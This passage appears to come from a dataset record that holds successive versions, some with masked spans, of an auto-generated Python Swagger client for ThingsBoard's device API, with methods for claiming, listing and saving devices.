makes a synchronous HTTP request by default. To make an\n asynchronous HTTP request, please pass async_req=True\n >>> thread = api_pe.get_tenant_devices_using_get_with_http_info(page_size, page, async_req=True)\n >>> result = thread.get()\n\n :param async_req bool\n :param str page_size: pageSize (required)\n :param str page: page (required)\n :param str type: type\n :param str text_search: textSearch\n :param str sort_property: sortProperty\n :param str sort_order: sortOrder\n :return: PageDataDevice\n If the method is called asynchronously,\n returns the request thread.\n \"\"\"\n all_params = ['page_size', 'page', 'type', 'text_search',\n 'sort_property', 'sort_order']\n all_params.append('async_req')\n all_params.append('_return_http_data_only')\n all_params.append('_preload_content')\n all_params.append('_request_timeout')\n params = locals()\n for key, val in six.iteritems(params['kwargs']):\n params[key] = val\n del params['kwargs']\n if 'page_size' not in params or params['page_size'] is None:\n raise ValueError(\n 'Missing the required parameter `page_size` when calling `get_tenant_devices_using_get`'\n )\n if 'page' not in params or params['page'] is None:\n raise ValueError(\n 'Missing the required parameter `page` when calling `get_tenant_devices_using_get`'\n )\n collection_formats = {}\n path_params = {}\n query_params = []\n if 'type' in params:\n query_params.append(('type', params['type']))\n if 'text_search' in params:\n query_params.append(('textSearch', params['text_search']))\n if 'sort_property' in params:\n query_params.append(('sortProperty', params['sort_property']))\n if 'sort_order' in params:\n query_params.append(('sortOrder', params['sort_order']))\n if 'page_size' in params:\n query_params.append(('pageSize', params['page_size']))\n if 'page' in params:\n query_params.append(('page', params['page']))\n header_params = {}\n form_params = []\n local_var_files = {}\n body_params = None\n header_params['Accept'] = self.api_client.select_header_accept(['*/*'])\n header_params['Content-Type'\n ] = self.api_client.select_header_content_type(['application/json']\n )\n auth_settings = ['X-Authorization']\n return self.api_client.call_api(\n '/api/tenant/devices{?type,textSearch,sortProperty,sortOrder,pageSize,page}'\n , 'GET', path_params, query_params, header_params, body=\n body_params, post_params=form_params, files=local_var_files,\n response_type='PageDataDevice', auth_settings=auth_settings,\n async_req=params.get('async_req'), _return_http_data_only=\n params.get('_return_http_data_only'), _preload_content=params.\n get('_preload_content', True), _request_timeout=params.get(\n '_request_timeout'), collection_formats=collection_formats)\n <mask token>\n\n def get_user_devices_using_get_with_http_info(self, page_size, page, **\n kwargs):\n \"\"\"getUserDevices # noqa: E501\n\n This method makes a synchronous HTTP request by default. To make an\n asynchronous HTTP request, please pass async_req=True\n >>> thread = api_pe.get_user_devices_using_get_with_http_info(page_size, page, async_req=True)\n >>> result = thread.get()\n\n :param async_req bool\n :param str page_size: pageSize (required)\n :param str page: page (required)\n :param str type: type\n :param str text_search: textSearch\n :param str sort_property: sortProperty\n :param str sort_order: sortOrder\n :return: PageDataDevice\n If the method is called asynchronously,\n returns the request thread.\n \"\"\"\n all_params = ['page_size', 'page', 'type', 'text_search',\n 'sort_property', 'sort_order']\n all_params.append('async_req')\n all_params.append('_return_http_data_only')\n all_params.append('_preload_content')\n all_params.append('_request_timeout')\n params = locals()\n for key, val in six.iteritems(params['kwargs']):\n params[key] = val\n del params['kwargs']\n if 'page_size' not in params or params['page_size'] is None:\n raise ValueError(\n 'Missing the required parameter `page_size` when calling `get_user_devices_using_get`'\n )\n if 'page' not in params or params['page'] is None:\n raise ValueError(\n 'Missing the required parameter `page` when calling `get_user_devices_using_get`'\n )\n collection_formats = {}\n path_params = {}\n query_params = []\n if 'type' in params:\n query_params.append(('type', params['type']))\n if 'text_search' in params:\n query_params.append(('textSearch', params['text_search']))\n if 'sort_property' in params:\n query_params.append(('sortProperty', params['sort_property']))\n if 'sort_order' in params:\n query_params.append(('sortOrder', params['sort_order']))\n if 'page_size' in params:\n query_params.append(('pageSize', params['page_size']))\n if 'page' in params:\n query_params.append(('page', params['page']))\n header_params = {}\n form_params = []\n local_var_files = {}\n body_params = None\n header_params['Accept'] = self.api_client.select_header_accept(['*/*'])\n header_params['Content-Type'\n ] = self.api_client.select_header_content_type(['application/json']\n )\n auth_settings = ['X-Authorization']\n return self.api_client.call_api(\n '/api/user/devices{?type,textSearch,sortProperty,sortOrder,pageSize,page}'\n , 'GET', path_params, query_params, header_params, body=\n body_params, post_params=form_params, files=local_var_files,\n response_type='PageDataDevice', auth_settings=auth_settings,\n async_req=params.get('async_req'), _return_http_data_only=\n params.get('_return_http_data_only'), _preload_content=params.\n get('_preload_content', True), _request_timeout=params.get(\n '_request_timeout'), collection_formats=collection_formats)\n\n def save_device_using_post(self, device, **kwargs):\n \"\"\"saveDevice # noqa: E501\n\n This method makes a synchronous HTTP request by default. To make an\n asynchronous HTTP request, please pass async_req=True\n >>> thread = api_pe.save_device_using_post(device, async_req=True)\n >>> result = thread.get()\n\n :param async_req bool\n :param Device device: device (required)\n :param str access_token: accessToken\n :param str entity_group_id: entityGroupId\n :return: Device\n If the method is called asynchronously,\n returns the request thread.\n \"\"\"\n kwargs['_return_http_data_only'] = True\n if kwargs.get('async_req'):\n return self.save_device_using_post_with_http_info(device, **kwargs)\n else:\n data = self.save_device_using_post_with_http_info(device, **kwargs)\n return data\n\n def save_device_using_post_with_http_info(self, device, **kwargs):\n \"\"\"saveDevice # noqa: E501\n\n This method makes a synchronous HTTP request by default. To make an\n asynchronous HTTP request, please pass async_req=True\n >>> thread = api_pe.save_device_using_post_with_http_info(device, async_req=True)\n >>> result = thread.get()\n\n :param async_req bool\n :param Device device: device (required)\n :param str access_token: accessToken\n :param str entity_group_id: entityGroupId\n :return: Device\n If the method is called asynchronously,\n returns the request thread.\n \"\"\"\n all_params = ['device', 'access_token', 'entity_group_id']\n all_params.append('async_req')\n all_params.append('_return_http_data_only')\n all_params.append('_preload_content')\n all_params.append('_request_timeout')\n params = locals()\n for key, val in six.iteritems(params['kwargs']):\n params[key] = val\n del params['kwargs']\n if 'device' not in params or params['device'] is None:\n raise ValueError(\n 'Missing the required parameter `device` when calling `save_device_using_post`'\n )\n collection_formats = {}\n path_params = {}\n query_params = []\n if 'access_token' in params:\n query_params.append(('accessToken', params['access_token']))\n if 'entity_group_id' in params:\n query_params.append(('entityGroupId', params['entity_group_id']))\n header_params = {}\n form_params = []\n local_var_files = {}\n body_params = None\n if 'device' in params:\n body_params = params['device']\n header_params['Accept'] = self.api_client.select_header_accept(['*/*'])\n header_params['Content-Type'\n ] = self.api_client.select_header_content_type(['application/json']\n )\n auth_settings = ['X-Authorization']\n return self.api_client.call_api(\n '/api/device{?accessToken,entityGroupId}', 'POST', path_params,\n query_params, header_params, body=body_params, post_params=\n form_params, files=local_var_files, response_type='Device',\n auth_settings=auth_settings, async_req=params.get('async_req'),\n _return_http_data_only=params.get('_return_http_data_only'),\n _preload_content=params.get('_preload_content', True),\n _request_timeout=params.get('_request_timeout'),\n collection_formats=collection_formats)\n", "step-4": "<mask token>\n\n\nclass DeviceControllerApi(DeviceControllerApi):\n <mask token>\n\n def __init__(self, api_client=None):\n super(DeviceControllerApi, self).__init__(api_client)\n\n def claim_device_using_post(self, device_name, **kwargs):\n \"\"\"claimDevice # noqa: E501\n\n This method makes a synchronous HTTP request by default. To make an\n asynchronous HTTP request, please pass async_req=True\n >>> thread = api_pe.claim_device_using_post(device_name, async_req=True)\n >>> result = thread.get()\n\n :param async_req bool\n :param str device_name: deviceName (required)\n :param ClaimRequest claim_request: claimRequest\n :param str sub_customer_id: subCustomerId\n :return: DeferredResultResponseEntity\n If the method is called asynchronously,\n returns the request thread.\n \"\"\"\n kwargs['_return_http_data_only'] = True\n if kwargs.get('async_req'):\n return self.claim_device_using_post_with_http_info(device_name,\n **kwargs)\n else:\n data = self.claim_device_using_post_with_http_info(device_name,\n **kwargs)\n return data\n\n def claim_device_using_post_with_http_info(self, device_name, **kwargs):\n \"\"\"claimDevice # noqa: E501\n\n This method makes a synchronous HTTP request by default. To make an\n asynchronous HTTP request, please pass async_req=True\n >>> thread = api_pe.claim_device_using_post_with_http_info(device_name, async_req=True)\n >>> result = thread.get()\n\n :param async_req bool\n :param str device_name: deviceName (required)\n :param ClaimRequest claim_request: claimRequest\n :param str sub_customer_id: subCustomerId\n :return: DeferredResultResponseEntity\n If the method is called asynchronously,\n returns the request thread.\n \"\"\"\n all_params = ['device_name', 'claim_request', 'sub_customer_id']\n all_params.append('async_req')\n all_params.append('_return_http_data_only')\n all_params.append('_preload_content')\n all_params.append('_request_timeout')\n params = locals()\n for key, val in six.iteritems(params['kwargs']):\n params[key] = val\n del params['kwargs']\n if 'device_name' not in params or params['device_name'] is None:\n raise ValueError(\n 'Missing the required parameter `device_name` when calling `claim_device_using_post`'\n )\n collection_formats = {}\n path_params = {}\n if 'device_name' in params:\n path_params['deviceName'] = params['device_name']\n query_params = []\n if 'sub_customer_id' in params:\n query_params.append(('subCustomerId', params['sub_customer_id']))\n header_params = {}\n form_params = []\n local_var_files = {}\n body_params = None\n if 'claim_request' in params:\n body_params = params['claim_request']\n header_params['Accept'] = self.api_client.select_header_accept(['*/*'])\n header_params['Content-Type'\n ] = self.api_client.select_header_content_type(['application/json']\n )\n auth_settings = ['X-Authorization']\n return self.api_client.call_api(\n '/api/customer/device/{deviceName}/claim{?subCustomerId}',\n 'POST', path_params, query_params, header_params, body=\n body_params, post_params=form_params, files=local_var_files,\n response_type='DeferredResultResponseEntity', auth_settings=\n auth_settings, async_req=params.get('async_req'),\n _return_http_data_only=params.get('_return_http_data_only'),\n _preload_content=params.get('_preload_content', True),\n _request_timeout=params.get('_request_timeout'),\n collection_formats=collection_formats)\n\n def get_customer_devices_using_get(self, customer_id, page_size, page,\n **kwargs):\n \"\"\"getCustomerDevices # noqa: E501\n\n This method makes a synchronous HTTP request by default. To make an\n asynchronous HTTP request, please pass async_req=True\n >>> thread = api_pe.get_customer_devices_using_get(customer_id, page_size, page, async_req=True)\n >>> result = thread.get()\n\n :param async_req bool\n :param str customer_id: customerId (required)\n :param str page_size: pageSize (required)\n :param str page: page (required)\n :param str type: type\n :param str text_search: textSearch\n :param str sort_property: sortProperty\n :param str sort_order: sortOrder\n :return: PageDataDevice\n If the method is called asynchronously,\n returns the request thread.\n \"\"\"\n kwargs['_return_http_data_only'] = True\n if kwargs.get('async_req'):\n return self.get_customer_devices_using_get_with_http_info(\n customer_id, page_size, page, **kwargs)\n else:\n data = self.get_customer_devices_using_get_with_http_info(\n customer_id, page_size, page, **kwargs)\n return data\n\n def get_customer_devices_using_get_with_http_info(self, customer_id,\n page_size, page, **kwargs):\n \"\"\"getCustomerDevices # noqa: E501\n\n This method makes a synchronous HTTP request by default. To make an\n asynchronous HTTP request, please pass async_req=True\n >>> thread = api_pe.get_customer_devices_using_get_with_http_info(customer_id, page_size, page, async_req=True)\n >>> result = thread.get()\n\n :param async_req bool\n :param str customer_id: customerId (required)\n :param str page_size: pageSize (required)\n :param str page: page (required)\n :param str type: type\n :param str text_search: textSearch\n :param str sort_property: sortProperty\n :param str sort_order: sortOrder\n :return: PageDataDevice\n If the method is called asynchronously,\n returns the request thread.\n \"\"\"\n all_params = ['customer_id', 'page_size', 'page', 'type',\n 'text_search', 'sort_property', 'sort_order']\n all_params.append('async_req')\n all_params.append('_return_http_data_only')\n all_params.append('_preload_content')\n all_params.append('_request_timeout')\n params = locals()\n for key, val in six.iteritems(params['kwargs']):\n params[key] = val\n del params['kwargs']\n if 'customer_id' not in params or params['customer_id'] is None:\n raise ValueError(\n 'Missing the required parameter `customer_id` when calling `get_customer_devices_using_get`'\n )\n if 'page_size' not in params or params['page_size'] is None:\n raise ValueError(\n 'Missing the required parameter `page_size` when calling `get_customer_devices_using_get`'\n )\n if 'page' not in params or params['page'] is None:\n raise ValueError(\n 'Missing the required parameter `page` when calling `get_customer_devices_using_get`'\n )\n collection_formats = {}\n path_params = {}\n if 'customer_id' in params:\n path_params['customerId'] = params['customer_id']\n query_params = []\n if 'type' in params:\n query_params.append(('type', params['type']))\n if 'text_search' in params:\n query_params.append(('textSearch', params['text_search']))\n if 'sort_property' in params:\n query_params.append(('sortProperty', params['sort_property']))\n if 'sort_order' in params:\n query_params.append(('sortOrder', params['sort_order']))\n if 'page_size' in params:\n query_params.append(('pageSize', params['page_size']))\n if 'page' in params:\n query_params.append(('page', params['page']))\n header_params = {}\n form_params = []\n local_var_files = {}\n body_params = None\n header_params['Accept'] = self.api_client.select_header_accept(['*/*'])\n header_params['Content-Type'\n ] = self.api_client.select_header_content_type(['application/json']\n )\n auth_settings = ['X-Authorization']\n return self.api_client.call_api(\n '/api/customer/{customerId}/devices{?type,textSearch,sortProperty,sortOrder,pageSize,page}'\n , 'GET', path_params, query_params, header_params, body=\n body_params, post_params=form_params, files=local_var_files,\n response_type='PageDataDevice', auth_settings=auth_settings,\n async_req=params.get('async_req'), _return_http_data_only=\n params.get('_return_http_data_only'), _preload_content=params.\n get('_preload_content', True), _request_timeout=params.get(\n '_request_timeout'), collection_formats=collection_formats)\n\n def get_devices_by_entity_group_id_using_get(self, entity_group_id,\n page_size, page, **kwargs):\n \"\"\"getDevicesByEntityGroupId # noqa: E501\n\n This method makes a synchronous HTTP request by default. To make an\n asynchronous HTTP request, please pass async_req=True\n >>> thread = api_pe.get_devices_by_entity_group_id_using_get(entity_group_id, page_size, page, async_req=True)\n >>> result = thread.get()\n\n :param async_req bool\n :param str entity_group_id: entityGroupId (required)\n :param str page_size: Page size (required)\n :param str page: Page (required)\n :param str text_search: textSearch\n :param str sort_property: sortProperty\n :param str sort_order: sortOrder\n :return: PageDataDevice\n If the method is called asynchronously,\n returns the request thread.\n \"\"\"\n kwargs['_return_http_data_only'] = True\n if kwargs.get('async_req'):\n return (self.\n get_devices_by_entity_group_id_using_get_with_http_info(\n entity_group_id, page_size, page, **kwargs))\n else:\n data = (self.\n get_devices_by_entity_group_id_using_get_with_http_info(\n entity_group_id, page_size, page, **kwargs))\n return data\n\n def get_devices_by_entity_group_id_using_get_with_http_info(self,\n entity_group_id, page_size, page, **kwargs):\n \"\"\"getDevicesByEntityGroupId # noqa: E501\n\n This method makes a synchronous HTTP request by default. To make an\n asynchronous HTTP request, please pass async_req=True\n >>> thread = api_pe.get_devices_by_entity_group_id_using_get_with_http_info(entity_group_id, page_size, page, async_req=True)\n >>> result = thread.get()\n\n :param async_req bool\n :param str entity_group_id: entityGroupId (required)\n :param str page_size: Page size (required)\n :param str page: Page (required)\n :param str text_search: textSearch\n :param str sort_property: sortProperty\n :param str sort_order: sortOrder\n :return: PageDataDevice\n If the method is called asynchronously,\n returns the request thread.\n \"\"\"\n all_params = ['entity_group_id', 'page_size', 'page', 'text_search',\n 'sort_property', 'sort_order']\n all_params.append('async_req')\n all_params.append('_return_http_data_only')\n all_params.append('_preload_content')\n all_params.append('_request_timeout')\n params = locals()\n for key, val in six.iteritems(params['kwargs']):\n params[key] = val\n del params['kwargs']\n if 'entity_group_id' not in params or params['entity_group_id'\n ] is None:\n raise ValueError(\n 'Missing the required parameter `entity_group_id` when calling `get_devices_by_entity_group_id_using_get`'\n )\n if 'page_size' not in params or params['page_size'] is None:\n raise ValueError(\n 'Missing the required parameter `page_size` when calling `get_devices_by_entity_group_id_using_get`'\n )\n if 'page' not in params or params['page'] is None:\n raise ValueError(\n 'Missing the required parameter `page` when calling `get_devices_by_entity_group_id_using_get`'\n )\n if 'page_size' in params and params['page_size'] < 1.0:\n raise ValueError(\n 'Invalid value for parameter `page_size` when calling `get_devices_by_entity_group_id_using_get`, must be a value greater than or equal to `1.0`'\n )\n if 'page' in params and params['page'] < 0.0:\n raise ValueError(\n 'Invalid value for parameter `page` when calling `get_devices_by_entity_group_id_using_get`, must be a value greater than or equal to `0.0`'\n )\n collection_formats = {}\n path_params = {}\n if 'entity_group_id' in params:\n path_params['entityGroupId'] = params['entity_group_id']\n query_params = []\n if 'text_search' in params:\n query_params.append(('textSearch', params['text_search']))\n if 'sort_property' in params:\n query_params.append(('sortProperty', params['sort_property']))\n if 'sort_order' in params:\n query_params.append(('sortOrder', params['sort_order']))\n if 'page_size' in params:\n query_params.append(('pageSize', params['page_size']))\n if 'page' in params:\n query_params.append(('page', params['page']))\n header_params = {}\n form_params = []\n local_var_files = {}\n body_params = None\n header_params['Accept'] = self.api_client.select_header_accept(['*/*'])\n header_params['Content-Type'\n ] = self.api_client.select_header_content_type(['application/json']\n )\n auth_settings = ['X-Authorization']\n return self.api_client.call_api(\n '/api/entityGroup/{entityGroupId}/devices{?textSearch,sortProperty,sortOrder,pageSize,page}'\n , 'GET', path_params, query_params, header_params, body=\n body_params, post_params=form_params, files=local_var_files,\n response_type='PageDataDevice', auth_settings=auth_settings,\n async_req=params.get('async_req'), _return_http_data_only=\n params.get('_return_http_data_only'), _preload_content=params.\n get('_preload_content', True), _request_timeout=params.get(\n '_request_timeout'), collection_formats=collection_formats)\n\n def get_tenant_devices_using_get(self, page_size, page, **kwargs):\n \"\"\"getTenantDevices # noqa: E501\n\n This method makes a synchronous HTTP request by default. To make an\n asynchronous HTTP request, please pass async_req=True\n >>> thread = api_pe.get_tenant_devices_using_get(page_size, page, async_req=True)\n >>> result = thread.get()\n\n :param async_req bool\n :param str page_size: pageSize (required)\n :param str page: page (required)\n :param str type: type\n :param str text_search: textSearch\n :param str sort_property: sortProperty\n :param str sort_order: sortOrder\n :return: PageDataDevice\n If the method is called asynchronously,\n returns the request thread.\n \"\"\"\n kwargs['_return_http_data_only'] = True\n if kwargs.get('async_req'):\n return self.get_tenant_devices_using_get_with_http_info(page_size,\n page, **kwargs)\n else:\n data = self.get_tenant_devices_using_get_with_http_info(page_size,\n page, **kwargs)\n return data\n\n def get_tenant_devices_using_get_with_http_info(self, page_size, page,\n **kwargs):\n \"\"\"getTenantDevices # noqa: E501\n\n This method makes a synchronous HTTP request by default. To make an\n asynchronous HTTP request, please pass async_req=True\n >>> thread = api_pe.get_tenant_devices_using_get_with_http_info(page_size, page, async_req=True)\n >>> result = thread.get()\n\n :param async_req bool\n :param str page_size: pageSize (required)\n :param str page: page (required)\n :param str type: type\n :param str text_search: textSearch\n :param str sort_property: sortProperty\n :param str sort_order: sortOrder\n :return: PageDataDevice\n If the method is called asynchronously,\n returns the request thread.\n \"\"\"\n all_params = ['page_size', 'page', 'type', 'text_search',\n 'sort_property', 'sort_order']\n all_params.append('async_req')\n all_params.append('_return_http_data_only')\n all_params.append('_preload_content')\n all_params.append('_request_timeout')\n params = locals()\n for key, val in six.iteritems(params['kwargs']):\n params[key] = val\n del params['kwargs']\n if 'page_size' not in params or params['page_size'] is None:\n raise ValueError(\n 'Missing the required parameter `page_size` when calling `get_tenant_devices_using_get`'\n )\n if 'page' not in params or params['page'] is None:\n raise ValueError(\n 'Missing the required parameter `page` when calling `get_tenant_devices_using_get`'\n )\n collection_formats = {}\n path_params = {}\n query_params = []\n if 'type' in params:\n query_params.append(('type', params['type']))\n if 'text_search' in params:\n query_params.append(('textSearch', params['text_search']))\n if 'sort_property' in params:\n query_params.append(('sortProperty', params['sort_property']))\n if 'sort_order' in params:\n query_params.append(('sortOrder', params['sort_order']))\n if 'page_size' in params:\n query_params.append(('pageSize', params['page_size']))\n if 'page' in params:\n query_params.append(('page', params['page']))\n header_params = {}\n form_params = []\n local_var_files = {}\n body_params = None\n header_params['Accept'] = self.api_client.select_header_accept(['*/*'])\n header_params['Content-Type'\n ] = self.api_client.select_header_content_type(['application/json']\n )\n auth_settings = ['X-Authorization']\n return self.api_client.call_api(\n '/api/tenant/devices{?type,textSearch,sortProperty,sortOrder,pageSize,page}'\n , 'GET', path_params, query_params, header_params, body=\n body_params, post_params=form_params, files=local_var_files,\n response_type='PageDataDevice', auth_settings=auth_settings,\n async_req=params.get('async_req'), _return_http_data_only=\n params.get('_return_http_data_only'), _preload_content=params.\n get('_preload_content', True), _request_timeout=params.get(\n '_request_timeout'), collection_formats=collection_formats)\n\n def get_user_devices_using_get(self, page_size, page, **kwargs):\n \"\"\"getUserDevices # noqa: E501\n\n This method makes a synchronous HTTP request by default. To make an\n asynchronous HTTP request, please pass async_req=True\n >>> thread = api_pe.get_user_devices_using_get(page_size, page, async_req=True)\n >>> result = thread.get()\n\n :param async_req bool\n :param str page_size: pageSize (required)\n :param str page: page (required)\n :param str type: type\n :param str text_search: textSearch\n :param str sort_property: sortProperty\n :param str sort_order: sortOrder\n :return: PageDataDevice\n If the method is called asynchronously,\n returns the request thread.\n \"\"\"\n kwargs['_return_http_data_only'] = True\n if kwargs.get('async_req'):\n return self.get_user_devices_using_get_with_http_info(page_size,\n page, **kwargs)\n else:\n data = self.get_user_devices_using_get_with_http_info(page_size,\n page, **kwargs)\n return data\n\n def get_user_devices_using_get_with_http_info(self, page_size, page, **\n kwargs):\n \"\"\"getUserDevices # noqa: E501\n\n This method makes a synchronous HTTP request by default. To make an\n asynchronous HTTP request, please pass async_req=True\n >>> thread = api_pe.get_user_devices_using_get_with_http_info(page_size, page, async_req=True)\n >>> result = thread.get()\n\n :param async_req bool\n :param str page_size: pageSize (required)\n :param str page: page (required)\n :param str type: type\n :param str text_search: textSearch\n :param str sort_property: sortProperty\n :param str sort_order: sortOrder\n :return: PageDataDevice\n If the method is called asynchronously,\n returns the request thread.\n \"\"\"\n all_params = ['page_size', 'page', 'type', 'text_search',\n 'sort_property', 'sort_order']\n all_params.append('async_req')\n all_params.append('_return_http_data_only')\n all_params.append('_preload_content')\n all_params.append('_request_timeout')\n params = locals()\n for key, val in six.iteritems(params['kwargs']):\n params[key] = val\n del params['kwargs']\n if 'page_size' not in params or params['page_size'] is None:\n raise ValueError(\n 'Missing the required parameter `page_size` when calling `get_user_devices_using_get`'\n )\n if 'page' not in params or params['page'] is None:\n raise ValueError(\n 'Missing the required parameter `page` when calling `get_user_devices_using_get`'\n )\n collection_formats = {}\n path_params = {}\n query_params = []\n if 'type' in params:\n query_params.append(('type', params['type']))\n if 'text_search' in params:\n query_params.append(('textSearch', params['text_search']))\n if 'sort_property' in params:\n query_params.append(('sortProperty', params['sort_property']))\n if 'sort_order' in params:\n query_params.append(('sortOrder', params['sort_order']))\n if 'page_size' in params:\n query_params.append(('pageSize', params['page_size']))\n if 'page' in params:\n query_params.append(('page', params['page']))\n header_params = {}\n form_params = []\n local_var_files = {}\n body_params = None\n header_params['Accept'] = self.api_client.select_header_accept(['*/*'])\n header_params['Content-Type'\n ] = self.api_client.select_header_content_type(['application/json']\n )\n auth_settings = ['X-Authorization']\n return self.api_client.call_api(\n '/api/user/devices{?type,textSearch,sortProperty,sortOrder,pageSize,page}'\n , 'GET', path_params, query_params, header_params, body=\n body_params, post_params=form_params, files=local_var_files,\n response_type='PageDataDevice', auth_settings=auth_settings,\n async_req=params.get('async_req'), _return_http_data_only=\n params.get('_return_http_data_only'), _preload_content=params.\n get('_preload_content', True), _request_timeout=params.get(\n '_request_timeout'), collection_formats=collection_formats)\n\n def save_device_using_post(self, device, **kwargs):\n \"\"\"saveDevice # noqa: E501\n\n This method makes a synchronous HTTP request by default. To make an\n asynchronous HTTP request, please pass async_req=True\n >>> thread = api_pe.save_device_using_post(device, async_req=True)\n >>> result = thread.get()\n\n :param async_req bool\n :param Device device: device (required)\n :param str access_token: accessToken\n :param str entity_group_id: entityGroupId\n :return: Device\n If the method is called asynchronously,\n returns the request thread.\n \"\"\"\n kwargs['_return_http_data_only'] = True\n if kwargs.get('async_req'):\n return self.save_device_using_post_with_http_info(device, **kwargs)\n else:\n data = self.save_device_using_post_with_http_info(device, **kwargs)\n return data\n\n def save_device_using_post_with_http_info(self, device, **kwargs):\n \"\"\"saveDevice # noqa: E501\n\n This method makes a synchronous HTTP request by default. To make an\n asynchronous HTTP request, please pass async_req=True\n >>> thread = api_pe.save_device_using_post_with_http_info(device, async_req=True)\n >>> result = thread.get()\n\n :param async_req bool\n :param Device device: device (required)\n :param str access_token: accessToken\n :param str entity_group_id: entityGroupId\n :return: Device\n If the method is called asynchronously,\n returns the request thread.\n \"\"\"\n all_params = ['device', 'access_token', 'entity_group_id']\n all_params.append('async_req')\n all_params.append('_return_http_data_only')\n all_params.append('_preload_content')\n all_params.append('_request_timeout')\n params = locals()\n for key, val in six.iteritems(params['kwargs']):\n params[key] = val\n del params['kwargs']\n if 'device' not in params or params['device'] is None:\n raise ValueError(\n 'Missing the required parameter `device` when calling `save_device_using_post`'\n )\n collection_formats = {}\n path_params = {}\n query_params = []\n if 'access_token' in params:\n query_params.append(('accessToken', params['access_token']))\n if 'entity_group_id' in params:\n query_params.append(('entityGroupId', params['entity_group_id']))\n header_params = {}\n form_params = []\n local_var_files = {}\n body_params = None\n if 'device' in params:\n body_params = params['device']\n header_params['Accept'] = self.api_client.select_header_accept(['*/*'])\n header_params['Content-Type'\n ] = self.api_client.select_header_content_type(['application/json']\n )\n auth_settings = ['X-Authorization']\n return self.api_client.call_api(\n '/api/device{?accessToken,entityGroupId}', 'POST', path_params,\n query_params, header_params, body=body_params, post_params=\n form_params, files=local_var_files, response_type='Device',\n auth_settings=auth_settings, async_req=params.get('async_req'),\n _return_http_data_only=params.get('_return_http_data_only'),\n _preload_content=params.get('_preload_content', True),\n _request_timeout=params.get('_request_timeout'),\n collection_formats=collection_formats)\n", "step-5": "# coding: utf-8\n# Copyright 2020. ThingsBoard\n# #\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n# #\n# http://www.apache.org/licenses/LICENSE-2.0\n# #\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\n\nfrom __future__ import absolute_import\n\nimport re # noqa: F401\n\n# python 2 and python 3 compatibility library\nimport six\n\nfrom tb_rest_client.api.api_ce import DeviceControllerApi\n\n\nclass DeviceControllerApi(DeviceControllerApi):\n \"\"\"NOTE: This class is auto generated by the swagger code generator program.\n Ref: https://github.com/swagger-api/swagger-codegen\n \"\"\"\n\n def __init__(self, api_client=None):\n super(DeviceControllerApi, self).__init__(api_client)\n\n def claim_device_using_post(self, device_name, **kwargs): # noqa: E501\n \"\"\"claimDevice # noqa: E501\n\n This method makes a synchronous HTTP request by default. To make an\n asynchronous HTTP request, please pass async_req=True\n >>> thread = api_pe.claim_device_using_post(device_name, async_req=True)\n >>> result = thread.get()\n\n :param async_req bool\n :param str device_name: deviceName (required)\n :param ClaimRequest claim_request: claimRequest\n :param str sub_customer_id: subCustomerId\n :return: DeferredResultResponseEntity\n If the method is called asynchronously,\n returns the request thread.\n \"\"\"\n kwargs['_return_http_data_only'] = True\n if kwargs.get('async_req'):\n return self.claim_device_using_post_with_http_info(device_name, **kwargs) # noqa: E501\n else:\n (data) = self.claim_device_using_post_with_http_info(device_name, **kwargs) # noqa: E501\n return data\n\n def claim_device_using_post_with_http_info(self, device_name, **kwargs): # noqa: E501\n \"\"\"claimDevice # noqa: E501\n\n This method makes a synchronous HTTP request by default. To make an\n asynchronous HTTP request, please pass async_req=True\n >>> thread = api_pe.claim_device_using_post_with_http_info(device_name, async_req=True)\n >>> result = thread.get()\n\n :param async_req bool\n :param str device_name: deviceName (required)\n :param ClaimRequest claim_request: claimRequest\n :param str sub_customer_id: subCustomerId\n :return: DeferredResultResponseEntity\n If the method is called asynchronously,\n returns the request thread.\n \"\"\"\n\n all_params = ['device_name', 'claim_request', 'sub_customer_id'] # noqa: E501\n all_params.append('async_req')\n all_params.append('_return_http_data_only')\n all_params.append('_preload_content')\n all_params.append('_request_timeout')\n\n params = locals()\n for key, val in six.iteritems(params['kwargs']):\n \n params[key] = val\n del params['kwargs']\n # verify the required parameter 'device_name' is set\n if ('device_name' not in params or\n params['device_name'] is None):\n raise ValueError(\"Missing the required parameter `device_name` when calling `claim_device_using_post`\") # noqa: E501\n\n collection_formats = {}\n\n path_params = {}\n if 'device_name' in params:\n path_params['deviceName'] = params['device_name'] # noqa: E501\n\n query_params = []\n if 'sub_customer_id' in params:\n query_params.append(('subCustomerId', params['sub_customer_id'])) # noqa: E501\n\n header_params = {}\n\n form_params = []\n local_var_files = {}\n\n body_params = None\n if 'claim_request' in params:\n body_params = params['claim_request']\n # HTTP header `Accept`\n header_params['Accept'] = self.api_client.select_header_accept(\n ['*/*']) # noqa: E501\n\n # HTTP header `Content-Type`\n header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501\n ['application/json']) # noqa: E501\n\n # Authentication setting\n auth_settings = ['X-Authorization'] # noqa: E501\n\n return self.api_client.call_api(\n '/api/customer/device/{deviceName}/claim{?subCustomerId}', 'POST',\n path_params,\n query_params,\n header_params,\n body=body_params,\n post_params=form_params,\n files=local_var_files,\n response_type='DeferredResultResponseEntity', # noqa: E501\n auth_settings=auth_settings,\n async_req=params.get('async_req'),\n _return_http_data_only=params.get('_return_http_data_only'),\n _preload_content=params.get('_preload_content', True),\n _request_timeout=params.get('_request_timeout'),\n collection_formats=collection_formats)\n\n def get_customer_devices_using_get(self, customer_id, page_size, page, **kwargs): # noqa: E501\n \"\"\"getCustomerDevices # noqa: E501\n\n This method makes a synchronous HTTP request by default. To make an\n asynchronous HTTP request, please pass async_req=True\n >>> thread = api_pe.get_customer_devices_using_get(customer_id, page_size, page, async_req=True)\n >>> result = thread.get()\n\n :param async_req bool\n :param str customer_id: customerId (required)\n :param str page_size: pageSize (required)\n :param str page: page (required)\n :param str type: type\n :param str text_search: textSearch\n :param str sort_property: sortProperty\n :param str sort_order: sortOrder\n :return: PageDataDevice\n If the method is called asynchronously,\n returns the request thread.\n \"\"\"\n kwargs['_return_http_data_only'] = True\n if kwargs.get('async_req'):\n return self.get_customer_devices_using_get_with_http_info(customer_id, page_size, page, **kwargs) # noqa: E501\n else:\n (data) = self.get_customer_devices_using_get_with_http_info(customer_id, page_size, page, **kwargs) # noqa: E501\n return data\n\n def get_customer_devices_using_get_with_http_info(self, customer_id, page_size, page, **kwargs): # noqa: E501\n 